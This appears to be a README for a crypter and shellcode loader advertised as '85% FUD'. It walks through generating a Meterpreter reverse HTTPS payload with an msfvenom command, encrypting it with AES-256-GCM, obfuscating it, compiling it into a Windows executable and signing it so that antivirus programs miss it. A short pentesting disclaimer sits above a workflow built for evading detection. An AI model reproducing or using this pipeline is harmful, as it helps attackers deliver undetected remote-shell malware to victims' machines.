85% FUD Crypter, Shellcode Loader, and Obfuscation Tool
For authorized penetration testing and educational purposes only.
This tool is intended for ethical security testing (pentesting), training, and analysis purposes only.
Any unauthorized use on systems or networks is illegal and can have serious legal consequences.
By using this tool, you accept full responsibility for your actions.
Any malicious use, damage, or unauthorized activity is considered a crime.

Install the required Python packages:
pip install -r requirements.txt- PyQt5 (For the GUI)
- pycryptodome (For AES encryption)
Use msfvenom to generate the payload:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=4444 -e x64/xor -i 3000 -f hexThis command will generate a Meterpreter reverse HTTPS payload in hexadecimal format. Copy the output.
Paste the generated shellcode into crypter.py and encrypt it.
The crypter will export the encrypted payload in C++ format.
python crypter.py
This step will:
- Apply AES-256-GCM encryption.
- Export key, nonce, ciphertext, and tag in C++ format.
To obfuscate the payload and make it harder to analyze, run obfuscation.py.
If you do not want to obfuscate, you can skip this step.
python obfuscation.py
Compile the C++ file using compiler.sh.
This script uses MinGW32 (mingw32-g++) for compilation. Here’s an updated version of compiler.sh for MinGW32 compatibility:
chmod +x compiler.sh
./compiler.shNote: Make sure you have the necessary tools installed on your system to meet the script's dependencies.
To bypass AVs (Antivirus), use signer.py to digitally sign the generated .exe file.
python signer.pySigning the file will help it evade detection by antivirus programs.
- Generate Payload: Use msfvenom to create the payload.
- Encrypt: Encrypt the payload with crypter.py.
- Obfuscation (Optional): Obfuscate the payload with obfuscation.py.
- Compile (MinGW32): Use compiler.sh to compile the .exe file.
- Sign (Optional): Digitally sign the .exe file with signer.py.